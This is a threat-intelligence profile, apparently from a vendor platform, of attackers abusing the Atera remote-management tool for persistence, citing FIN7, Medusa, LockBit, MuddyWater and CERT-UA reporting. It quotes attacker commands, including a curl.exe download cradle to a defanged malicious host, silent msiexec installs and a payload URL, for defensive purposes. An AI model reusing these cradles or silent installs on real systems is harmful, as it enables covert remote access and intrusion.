Atera is a legitimate cloud-based remote monitoring and management (RMM) platform that is repeatedly abused by threat actors as a remote access and persistence mechanism after initial compromise. Across the provided reporting, attackers used or attempted to use Atera to establish footholds, maintain access, run remote interactive PowerShell, transfer files, and support follow-on activity such as credential theft, lateral movement, data exfiltration, and ransomware deployment.
Observed delivery and installation methods include renamed or trojanized MSI installers, phishing-driven downloads, and post-exploitation deployment from compromised hosts. Examples in the content include renamed installers such as MSTeam-installer.msi; FIN7 staging legitimate software trojanized to contain an Atera agent installer on Amazon S3; and a CERT-UA-described campaign against Ukrainian defense enterprises in which GLUEEGG and DROPCLUE ultimately used curl.exe and msiexec /i setup.msi /qn to silently install the legitimate ATERA agent. In another intrusion involving exploitation of FortiClient EMS CVE-2023-48788 by the Medusa ransomware group, the actor attempted to install setup.msi from evka[.]pp.ua/cli/setup.msi, likely a renamed Atera binary, after enabling SQL Server xp_cmdshell.
The content associates Atera abuse with multiple threat actors and intrusion sets, including FIN7, Medusa ransomware operators, LockBit operators, Iranian threat actors, TA450/MuddyWater overlap, UAC-0180, and actors exploiting CitrixBleed (CVE-2023-4966) as documented by Mandiant. Mandiant observed Atera, AnyDesk, and SplashTop deployed after successful exploitation of CVE-2023-4966 to establish and maintain a foothold. LockBit operators reportedly deployed Atera after CitrixBleed exploitation to preserve access and enable remote, interactive PowerShell even after patching. NCC Group also observed Atera deployed as a secondary remote access and persistence mechanism during an Everest ransomware incident.
Targeting reflected in the content includes enterprise Windows environments, internet-exposed FortiClient EMS and Citrix NetScaler/Gateway environments, and Ukrainian defense enterprises. The content also notes broader abuse of legitimate RMM tools, including Atera, by cybercriminals in email campaigns and by Iranian threat actors to evade detection.
High-confidence artifacts and behaviors mentioned in the content include AteraAgent.exe; PowerShell commands used to enumerate or terminate AteraAgent.exe processes; MSI-based installation; and legitimate Atera infrastructure such as servicedesk.atera.com, which CERT-UA notes should be treated as suspicious if Atera is not authorized in the environment. Red Canary notes that AteraAgent.exe command-line parameters can include agent-id, account-id, environment, customer-id, and folder-id, which may help identify the owning instance during investigations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“Atera is a legitimate… remote monitoring and management tool… they install their own Atera agents…”
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...TA450 historically using several RMM tools, such as Atera, PDQ Connect, ScreenConnect, and SimpleHelp...
FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.
...завантаження і встановлення MSI-файлу легітимної програми для віддаленого управління ЕОМ ATERA...
22 distinct techniques documented for this family, organized by ATT&CK tactic.
T1078 (Valid Accounts) - атакующий использует trial или free аккаунт вендора как валидную учётную запись
Another common method observed to maintain access is by installing third-party remote access software such as AnyDesk, TeamViewer, Splashtop and Atera.
After ‘xp_cmdshell’ was enabled, the threat actor used it to install different remote management and monitoring (RMM) tools... they executed a PowerShell command designed to list all processes associated with the Atera RMM software.
After which, the adversary first attempted a cradle (command line that downloads and installs a payload as a single command) to install ScreenConnect: cmd.exe /c mkdir C:\Temp 2>NUL & curl.exe -L hxxps[:]//server[.]rarexterna[.]top/Bin/ScreenConnect.ClientSetup[.]msi
T1078 (Valid Accounts) - атакующий использует trial или free аккаунт вендора как валидную учётную запись
Post-compromise actions in Atera also included: ... An obfuscated PowerShell command used to download the Level RMM tool
Even when the file is renamed to something like party_invite.exe , or Voicemailaudioext.exe ... A common lure is themed as a Social Security statement ( ssa.msi ) ... using lures such as a document ( docmentfilecsm_jw98evavuqm5gb3.exe ) or an IRS tax-related file ( IRS-Statement_Pr2ui4J9cfA6YEu.exe ).
A subsequent sample, identified as Atera Remote Management software, also communicated with 193.27.228.127 . It appeared the actor used these two tools in concert, potentially switching to the use of Atera after initial compromise was achieved.
Post-compromise actions in Atera also included: ... An SSH tunnel towards 51.16.209[.]105
Post-compromise actions in Atera also included: ... An SSH tunnel towards 51.16.209[.]105;
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A cloud-based IT management platform abused through renamed MSI installers. Attackers use its package management and agent functionality to install and manage secondary payloads, notably ScreenConnect.
Remote management and monitoring tool abused by the threat actor as a persistence mechanism after exploitation of FortiClient EMS.
A legitimate remote monitoring and management tool abused by Iranian threat actors for persistence and lateral movement.
Legitimate RMM tool previously abused by TA450 for foothold/remote access in intrusions.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.